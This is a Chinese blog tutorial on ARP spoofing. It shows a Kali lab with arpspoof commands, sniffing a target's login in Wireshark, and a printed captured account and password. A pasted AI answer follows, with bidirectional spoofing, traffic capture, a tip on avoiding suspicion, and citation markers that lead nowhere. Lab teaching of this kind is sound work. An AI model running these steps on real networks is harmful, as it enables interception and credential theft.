ARP欺骗

本文介绍ARP协议及ARP欺骗原理,并通过具体实验步骤展示了如何实施ARP欺骗,包括使用Arpspoof和Wireshark工具来捕获并分析网络数据。

目录

一、ARP协议

二、ARP欺骗的原理

 三、实验环境

四、实验步骤


一、ARP协议

每一个主机都有一个ARP高速缓存,此缓存中记录了最近一段时间内其它IP地址与其MAC地址的对应关系。如果本机想与某台主机通信,则首先在ARP高速缓存中查找此台主机的IP和MAC信息,如果存在,则直接利用此MAC地址构造以太帧;如果不存在,则向本网络上每一个主机广播一个ARP请求报文,其意义是"如果你有此IP地址,请告诉我你的MAC地址",目的主机收到此请求包后,发送一个ARP响应报文,本机收到此响应后,把相关信息记录在ARP高速缓存中,以下的步骤同上。


                                                         ARP报文格式

可以看出,ARP协议是有缺点的,第三方主机可以构造一个ARP欺骗报文,而源主机却无法分辨真假。如果发送者硬件地址字段填入攻击者的硬件地址,而发送者IP地址填入被假冒者的IP地址,那么就构造出了一个用于欺骗的ARP请求报文。那么被欺骗主机的ARP高速缓存,被假冒者的IP地址与其MAC地址的对应关系就会更改为欺骗者的,从而达到ARP欺骗的目的。特别的,如果攻击者冒充网关,将转发子网内到外网的所有通信量,以达到捕获其他主机的通信量,从而破坏数据传输的保密性。

二、ARP欺骗的原理

ARP欺骗的运作原理是由攻击者发送假的ARP数据包到网上,尤其是送到网关上。. 其目的是要让送至特定的IP地址的流量被错误送到攻击者所取代的地方。因此攻击者可将这些流量另行转送到真正的网关(被动式数据包嗅探,passive sniffing)或是篡改后再转送( 中间人攻击 ,man-in-the-middle attack)。攻击者亦可将ARP数据包导到不存在的 MAC地址 以达到阻断服务攻击的效果。

 三、实验环境

系统环境:Kali Linux 2、Windows

网络环境:交换网络结构

实验工具:Arpspoof、WireShark

四、实验步骤

1.先用ifconfig查询主机(kali)ip,然后用nmap扫描出同网段下的靶机(win7)。

 

2.用route -n得到靶机所处的网关

 3.在进行ARP欺骗前需要打开arp转发命令

echo 1>/proc/sys/net/ipv4/ip_forward

如果把1改为0,则为关闭,靶机的数据包发不出去,则会使靶机断网。

arpspoof的命令格式为:arpspoof -i 网卡 -t 目标ip 网关

输入命令:arpspoof -i eth0 -t 192.168.131.130 192.168.131.2

如图所示,靶机被断网了。

 

 接下来打开arp转发命令,进行arp欺骗。

 靶机又恢复了网络 

4.打开wireshark,输入ip.addr==192.168.131.130,抓取靶机的数据。

5.用靶机登录××生活网,进入登录界面登录,随便输入。

6.此时打开wireshark ,看看在主机(kali)是否能抓取靶机输入的账号和密码。

可以看到刚才登录的账号是:13100436564  密码是:12121212

 

 

 

 

 

 

<think>好的,我现在需要帮助用户了解如何进行ARP欺骗攻击的实验。首先,用户明确提到要在安全测试环境下进行实验,所以必须强调合法性和授权,避免用户误用。接下来,根据用户提供的引用内容,我需要整合这些信息来构建实验步骤和原理的解释。 首先,引用[1]和[2]详细说明了ARP欺骗的原理,包括伪造ARP响应、缓存中毒等步骤。而引用[4]和[5]则提到了具体的工具使用,比如arpspoof和Kali Linux中的工具。用户还提到了实验方法或教程,所以需要一步步的指导。 我需要确保实验环境的安全,比如使用虚拟机或封闭网络,防止影响真实网络。然后,列出所需的工具,如Kali Linux(内置arpspoof、dsniff等)、目标设备和网络设备。接下来,分步骤说明如何配置环境、启用IP转发、使用arpspoof发送伪造的ARP响应,以及如何验证攻击是否成功,比如检查ARP缓存表的变化,引用[3]中的命令ip -all netns exec arp -n可以用来查看ARP缓存。 同时,用户可能需要了解如何防御这种攻击,所以补充防御措施也是必要的,比如静态ARP绑定或使用ARP防护工具。此外,引用[2]提到的中间人攻击和数据截获可以进一步扩展,说明攻击后的数据监控方法,比如使用Wireshark进行流量分析。 需要确保步骤清晰,每个部分都对应到引用的内容,比如在步骤3中详细说明arpspoof的命令参数,引用[4]解释了sudo、-i、-t等参数的意义。在验证步骤中,引用[3]和[5]提供了查看ARP缓存和网关欺骗成功的例子。 最后,生成相关问题时要覆盖原理、工具、防御和实际应用,帮助用户全面理解ARP欺骗攻击的实验过程和相关知识。</think>### ARP欺骗攻击实验方法 #### 实验环境要求 1. **合法授权**:必须在隔离的实验室或虚拟网络(如VMware/VirtualBox搭建的局域网)中实施[^1] 2. **测试工具**:Kali Linux(含arpspoof/dsniff工具包)、至少两台虚拟机(攻击机+靶机) 3. **网络配置**:所有设备需处于同一局域网段(如192.168.1.0/24) #### 实验原理 通过发送伪造的ARP响应包,使目标设备将攻击机的MAC地址与网关IP绑定,实现流量劫持[^2]。核心公式描述: $$ \text{伪造ARP报文} = \text{目标IP} \xrightarrow{\text{映射}} \text{攻击者MAC} $$ #### 实验步骤 1. **环境准备** - 关闭防火墙:`sudo systemctl stop firewalld`(Linux靶机) - 确认IP-MAC对应关系:`arp -a` 2. **启用IP转发(攻击机)** ```bash echo 1 > /proc/sys/net/ipv4/ip_forward # 防止网络中断引起怀疑[^5] ``` 3. **实施ARP欺骗** ```bash sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 # 欺骗靶机[^4] sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.100 # 双向欺骗网关 ``` 4. **验证攻击效果** ```bash # 在靶机执行(Windows:arp -a,Linux:arp -n) ns531> arp -n | grep 192.168.1.1 # 应显示攻击机MAC地址[^3] ``` 5. **流量监控(可选)** ```bash sudo tcpdump -i eth0 host 192.168.1.100 # 查看明文流量 driftnet -i eth0 # 可视化图片捕获 ``` #### 防御措施 - 静态ARP绑定:`arp -s 192.168.1.1 00:11:22:33:44:55` - 网络层防护:启用DHCP Snooping+DAI(动态ARP检测)
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值